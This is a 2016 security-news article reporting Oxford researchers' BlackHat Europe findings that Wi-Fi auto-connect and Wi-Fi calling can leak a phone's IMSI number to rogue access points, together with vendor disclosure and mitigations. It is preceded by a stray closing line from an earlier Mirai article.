In our previous article, we provided some basic, rather effective, solutions, which would help you protect your smart devices from becoming part of the Mirai botnet. You can also check also yourself if your IoT device is vulnerable to Mirai malware. Head on to this article.

Wi-Fi can be turned into IMSI Catcher to Track Cell Phone Users Everywhere
4.11.2016 thehackernews Mobil
Here's a new danger to your smartphone security: Your mobile device can be hijacked and tracked without your knowledge.
Remember Stingrays?
The controversial cell phone spying tool, also known as "IMSI catchers," has long been used by law enforcement to track and monitor mobile users by mimicking a cellphone tower and tricking their devices to connect to them. Sometimes it even intercepts calls and Internet traffic, sends fake texts, and installs spyware on a victim's phone.
Setting up such Stingrays-type surveillance devices, of course, is expensive and needs a lot of efforts, but researchers have now found a new, cheapest way to do the same thing with a simple Wi-Fi hotspot.
Yes, Wi-Fi network can capture IMSI numbers from nearby smartphones, allowing almost anyone to track and monitor people wirelessly.
IMSI or international mobile subscriber identity is a unique 15-digit number used for authentication of a person when moving network to network. The number is stored in the read-only section of a SIM card and with the mobile operator.
Note: Don't confuse the IMSI number with the IMEI number. IMSI is tied to a user, while IMEI is tied to a device.
Stealing your Fingerprints to Track you Everywhere
In a presentation at BlackHat Europe, researchers Piers O'Hanlon and Ravishankar Borgaonkar from Oxford University have demonstrated a new type of IMSI catcher attack that operates over WiFi, allowing anyone to capture a smartphone's IMSI number within a second as the users' pass by.
The attack would then use that IMSI number to spy on the user's every movement.
The actual issue resides in the way most modern smartphones, including Android and iOS devices, in the world connect to Wi-Fi networks.
There are two widely implemented protocols in most modern mobile operating systems:
Extensible Authentication Protocol (EAP)
Authentication and Key Agreement (AKA) protocols
These protocols allow smartphones to auto-connect to public WiFi hotspots.
Modern smartphones are programmed to automatically connect to known Wi-Fi networks by handing over their IMSI numbers to log into the network, without owner's interaction.
So, attackers exploiting the WiFi authentication protocols could allow them to set up a "rogue access point" masquerading as a well-known WiFi network and trick smartphones in that range to connect.
Once connected the rogue access point extracts their IMSI numbers immediately. This captured unique identifier of your smartphone would then allow attackers to track your movements wherever you go.
Intercepting WiFi Calling to Steal Your Unique Identity Number
The researcher also demonstrated another attack vector whereby attackers can hijack the WiFi calling feature offered by mobile operators.
This technology is different from voice calling on WhatsApp or Skype app which uses voice over Internet Protocol.
Whereas, WiFi calling, which is supported on iOS and Android devices, allows users to make voice calls over WiFi by connecting to the operator's Edge Packet Data Gateway (EPDG) using the encrypted IP security (IPSec) protocol.
Like the WiFi auto connect feature, the Internet Key Exchange (IKEv2) protocol used for authenticating WiFi calling is also based on identities such as the IMSI number, which are exchanged over EAP-AKA.
EAP-AKA exchanges are encrypted, but the problem is that they are not protected by a certificate.
This issue exposes the feature to man-in-the-middle (MITM) attacks, allowing attackers to intercept the traffic from a smartphone trying to make the call over WiFi and quickly extract the IMSI number in seconds, the researchers said.
The good news is that you can disable the Wi-Fi calling feature on your device, but Wi-Fi auto connect can only be disabled when such a network is in range.
The researchers reported the issues to both the mobile OS companies, including Apple, Google, Microsoft and Blackberry, and the operators such as GSMA, and have been working with them to ensure the future protection of the IMSI number.
Apple, as a result of conversations with the duo researchers, has implemented a new technology in iOS10 that allows handsets to exchange pseudonyms and not identifiers, helping mitigate the threat.
The duo concluded their research [slides PDF] by showing a proof-of-concept system that demonstrates their IMSI catcher employing passive as well as active techniques.